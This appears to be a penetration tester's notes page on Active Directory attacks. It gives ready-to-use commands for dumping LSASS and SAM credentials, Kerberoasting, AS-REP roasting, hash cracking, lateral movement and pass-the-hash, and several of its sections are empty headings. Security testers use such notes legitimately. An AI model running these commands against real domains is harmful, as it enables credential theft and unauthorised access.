# Active Directory When testing active directory our goals should be to: * gain a foothold on a machine on the domain and elevate our privileges * enumerate the domain to find additional accounts, users, etc. that ideally increase our privilege level on the domain * gain access to the domain controller * persist on the domain (situation dependent) Assuming that we've already [enumerated](https://notes.oncyberwar.com/3.-enumeration/active-directory) the domain, we should now be focused on gathering credentials to move laterally within the domain. ### Cached credential retrieval Once you have local admin privileges on a domain joined computer you can dump the credentials stored in LSASS and the SAM database. #### Mimikatz ``` mimikatz.exe privilege::debug sekurlsa::logonpasswords (dump lsass) lsadump::sam (dump sam database) sekurlsa::tickets (to dump tickets stored in memory) kerberos::list (view cached kerberos tickets for the current user) ``` ### Attacks #### Kerberoasting If we find interesting service accounts while enumerating we can export the Kerberos 5 etype 23 hash for offline cracking. ``` Extracting SPN hashes crackmapexec ldap $ldapIPaddress -u user -p pass --kerberoasting output.txt kerberos::list /export Crack john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt hashcat -m 13100 hash.txt /path/to/wordlist -o output.txt ``` Alternatively, we can use the **Invoke-Kerberoast.ps1,** to enumerate SPNs, request tickets, and export them in a format ready for cracking. #### AS-REP Roasting The AS-REP roasting attack attempts to retrieve the Kerberos hash of users that don't require Kerberos pre-authentication. ``` Searching for AS-REP Roastable users crackmapexec ldap $ldapIPaddress -u user -p 'pass' --asreproast output.txt GetNPUsers.py domain/user:pass -dc-ip ipaddress -request format john -output.txt Crack john --format:krb5asrep output.txt hashcat -m 18200 hash.txt /path/to/wordlist -o output.txt ``` #### Unconstrained delegation #### Constrained delegataion #### DCSync ### Lateral movement Moving laterally within a domain is fairly straightforward once you have credentials. #### Windows remote management ``` winrs -remote:hostname -u:username -p:password (command) ``` #### PS-Remoting \*\* #### PS-EXEC ``` psexec.py domain/user:password@ipaddress ``` #### SMB-EXEC ``` smbexec.py username:password@ipaddress ``` #### Pass the hash Pass the hash allows attackers to authenticate to a remote system using an NTLM hash. {% hint style="info" %} Many PTH tools require both the LM and NTLM hash as part of the command. If the LM hash is not available you can use a string of 32 zeros in its place. {% endhint %} ``` Passing-the-hash Toolkit pth-winexe -U Administrator%$LMHash:$NTLMHash //$ipaddress cmd Mimikatz privilege::debug sekurlsa::pth /user:Administrator /domain:test.local /ntlm:$hash SMBclient smbclient.py -hashes LMHash:NTLMHash domain/user@$ipaddress PS Exec psexec.py -hashes :NTLMhash administrator@ipaddress ``` #### Overpass the hash The overpass the hash technique utilizes the NTLM hash to obtain a Kerberos ticket, thus avoiding NTLM authentication. #### Pass the ticket ### Persistence #### Golden tickets